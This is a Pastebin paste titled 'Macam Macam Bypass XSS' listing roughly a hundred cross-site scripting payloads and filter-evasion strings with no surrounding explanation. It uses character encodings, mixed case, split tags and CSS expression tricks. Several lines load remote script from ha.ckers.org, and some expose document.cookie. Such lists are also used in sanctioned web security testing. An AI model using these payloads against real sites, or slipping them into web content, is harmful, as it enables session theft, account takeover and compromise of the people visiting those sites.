API tools faq
paste
RokiAdhytama

Macam Macam Bypass XSS

RokiAdhytama
Jun 7th, 2019
121
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 6.11 KB | None | 0 0
raw download clone embed print report
  1. ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
  2. '';!--"<XSS>=&{()}
  3. 0\"autofocus/onfocus=alert(1)--><video/poster/onerror=prompt(2)>"-confirm(3)-"
  4. <script/src=data:,alert()>
  5. <marquee/onstart=alert()>
  6. <video/poster/onerror=alert()>
  7. <isindex/autofocus/onfocus=alert()>
  8. <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
  9. <IMG SRC="javascript:alert('XSS');">
  10. <IMG SRC=javascript:alert('XSS')>
  11. <IMG SRC=JaVaScRiPt:alert('XSS')>
  12. <IMG SRC=javascript:alert("XSS")>
  13. <IMG SRC=`javascript:alert("RSnake says, 'XSS'")`>
  14. <a onmouseover="alert(document.cookie)">xxs link</a>
  15. <a onmouseover=alert(document.cookie)>xxs link</a>
  16. <IMG """><SCRIPT>alert("XSS")</SCRIPT>">
  17. <IMG SRC=javascript:alert(String.fromCharCode(88,83,83))>
  18. <IMG SRC=# onmouseover="alert('xxs')">
  19. <IMG SRC= onmouseover="alert('xxs')">
  20. <IMG onmouseover="alert('xxs')">
  21. <IMG SRC=/ onerror="alert(String.fromCharCode(88,83,83))"></img>
  22. <IMG SRC=&#106;&#97;&#118;&#97;&#115;&#99;&#114;&#105;&#112;&#116;&#58;&#97;&#108;&#101;&#114;&#116;&#40;
  23. &#39;&#88;&#83;&#83;&#39;&#41;>
  24. <IMG SRC=&#0000106&#0000097&#0000118&#0000097&#0000115&#0000099&#0000114&#0000105&#0000112&#0000116&#0000058&#0000097&
  25. #0000108&#0000101&#0000114&#0000116&#0000040&#0000039&#0000088&#0000083&#0000083&#0000039&#0000041>
  26. <IMG SRC=&#x6A&#x61&#x76&#x61&#x73&#x63&#x72&#x69&#x70&#x74&#x3A&#x61&#x6C&#x65&#x72&#x74&#x28&#x27&#x58&#x53&#x53&#x27&#x29>
  27. <IMG SRC="jav ascript:alert('XSS');">
  28. <IMG SRC="jav&#x09;ascript:alert('XSS');">
  29. <IMG SRC="jav&#x0A;ascript:alert('XSS');">
  30. <IMG SRC="jav&#x0D;ascript:alert('XSS');">
  31. <IMG SRC=" &#14; javascript:alert('XSS');">
  32. <SCRIPT/XSS SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  33. <BODY onload!#$%&()*~+-_.,:;?@[/|\]^`=alert("XSS")>
  34. <SCRIPT/SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  35. <<SCRIPT>alert("XSS");//<</SCRIPT>
  36. <SCRIPT SRC=http://ha.ckers.org/xss.js?< B >
  37. <SCRIPT SRC=//ha.ckers.org/.j>
  38. <IMG SRC="javascript:alert('XSS')"
  39. <iframe src=http://ha.ckers.org/scriptlet.html <
  40. \";alert('XSS');//
  41. </script><script>alert('XSS');</script>
  42. </TITLE><SCRIPT>alert("XSS");</SCRIPT>
  43. <INPUT TYPE="IMAGE" SRC="javascript:alert('XSS');">
  44. <BODY BACKGROUND="javascript:alert('XSS')">
  45. <IMG DYNSRC="javascript:alert('XSS')">
  46. <IMG LOWSRC="javascript:alert('XSS')">
  47. <STYLE>li {list-style-image: url("javascript:alert('XSS')");}</STYLE><UL><LI>XSS</br>
  48. <IMG SRC='vbscript:msgbox("XSS")'>
  49. <IMG SRC="livescript:[code]">
  50. <BODY ONLOAD=alert('XSS')>
  51. <BGSOUND SRC="javascript:alert('XSS');">
  52. <BR SIZE="&{alert('XSS')}">
  53. <LINK REL="stylesheet" HREF="javascript:alert('XSS');">
  54. <LINK REL="stylesheet" HREF="http://ha.ckers.org/xss.css">
  55. <STYLE>@import'http://ha.ckers.org/xss.css';</STYLE>
  56. <META HTTP-EQUIV="Link" Content="<http://ha.ckers.org/xss.css>; REL=stylesheet">
  57. <STYLE>BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}</STYLE>
  58. <STYLE>@im\port'\ja\vasc\ript:alert("XSS")';</STYLE>
  59. <IMG STYLE="xss:expr/*XSS*/ession(alert('XSS'))">
  60. exp/*<A STYLE='no\xss:noxss("*//*");
  61. xss:ex/*XSS*//*/*/pression(alert("XSS"))'>
  62. <STYLE TYPE="text/javascript">alert('XSS');</STYLE>
  63. <STYLE>.XSS{background-image:url("javascript:alert('XSS')");}</STYLE><A CLASS=XSS></A>
  64. <STYLE type="text/css">BODY{background:url("javascript:alert('XSS')")}</STYLE>
  65. <XSS STYLE="xss:expression(alert('XSS'))">
  66. <XSS STYLE="behavior: url(xss.htc);">
  67. ¼script¾alert(¢XSS¢)¼/script¾
  68. <META HTTP-EQUIV="refresh" CONTENT="0;url=javascript:alert('XSS');">
  69. <META HTTP-EQUIV="refresh" CONTENT="0;url=data:text/html base64,PHNjcmlwdD5hbGVydCgnWFNTJyk8L3NjcmlwdD4K">
  70. <META HTTP-EQUIV="refresh" CONTENT="0; URL=http://;URL=javascript:alert('XSS');">
  71. <IFRAME SRC="javascript:alert('XSS');"></IFRAME>
  72. <IFRAME SRC=# onmouseover="alert(document.cookie)"></IFRAME>
  73. <FRAMESET><FRAME SRC="javascript:alert('XSS');"></FRAMESET>
  74. <TABLE BACKGROUND="javascript:alert('XSS')">
  75. <TABLE><TD BACKGROUND="javascript:alert('XSS')">
  76. <DIV STYLE="background-image: url(javascript:alert('XSS'))">
  77. <DIV STYLE="background-image:\0075\0072\006C\0028'\006a\0061\0076\0061\0073\0063\0072\0069\0070\0074\003a\0061\006c\0065\0072\0074\0028.1027\0058.1053\0053\0027\0029'\0029">
  78. <DIV STYLE="background-image: url(&#1;javascript:alert('XSS'))">
  79. <DIV STYLE="width: expression(alert('XSS'));">
  80. <!--[if gte IE 4]><SCRIPT>alert('XSS');</SCRIPT><![endif]-->
  81. <BASE HREF="javascript:alert('XSS');//">
  82. <OBJECT TYPE="text/x-scriptlet" DATA="http://ha.ckers.org/scriptlet.html"></OBJECT>
  83. <!--#exec cmd="/bin/echo '<SCR'"--><!--#exec cmd="/bin/echo 'IPT SRC=http://ha.ckers.org/xss.js></SCRIPT>'"-->
  84. <? echo('<SCR)';echo('IPT>alert("XSS")</SCRIPT>'); ?>
  85. <IMG SRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode">
  86. <META HTTP-EQUIV="Set-Cookie" Content="USERID=<SCRIPT>alert('XSS')</SCRIPT>">
  87. <HEAD><META HTTP-EQUIV="CONTENT-TYPE" CONTENT="text/html; charset=UTF-7"> </HEAD>+ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
  88. <SCRIPT a=">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  89. <SCRIPT =">" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  90. <SCRIPT a=">" '' SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  91. <SCRIPT "a='>'" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  92. <SCRIPT a=`>` SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  93. <SCRIPT a=">'>" SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  94. <SCRIPT>document.write("<SCRI");</SCRIPT>PT SRC="http://ha.ckers.org/xss.js"></SCRIPT>
  95. <A HREF="http://66.102.7.147/">XSS</A>
  96. 0\"autofocus/onfocus=alert(1)--><video/poster/ error=prompt(2)>"-confirm(3)-"
  97. veris-->group<svg/onload=alert(/XSS/)//
  98. #"><img src=M onerror=alert('XSS');>
  99. element[attribute='<img src=x onerror=alert('XSS');>
  100. [<blockquote cite="]">[" onmouseover="alert('RVRSH3LL_XSS');" ]
  101. %22;alert%28%27RVRSH3LL_XSS%29//
  102. javascript:alert%281%29;
  103. <w contenteditable id=x onfocus=alert()>
  104. alert;pg("XSS")
  105. <svg/onload=%26%23097lert%26lpar;1337)>
  106. <script>for((i)in(self))eval(i)(1)</script>
  107. <scr<script>ipt>alert(1)</scr</script>ipt><scr<script>ipt>alert(1)</scr</script>ipt>
  108. <sCR<script>iPt>alert(1)</SCr</script>IPt>
  109. <a href="data:text/html;base64,PHNjcmlwdD5hbGVydCgiSGVsbG8iKTs8L3NjcmlwdD4=">test</a>
Add Comment
Please, Sign In to add comment
Public Pastes
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!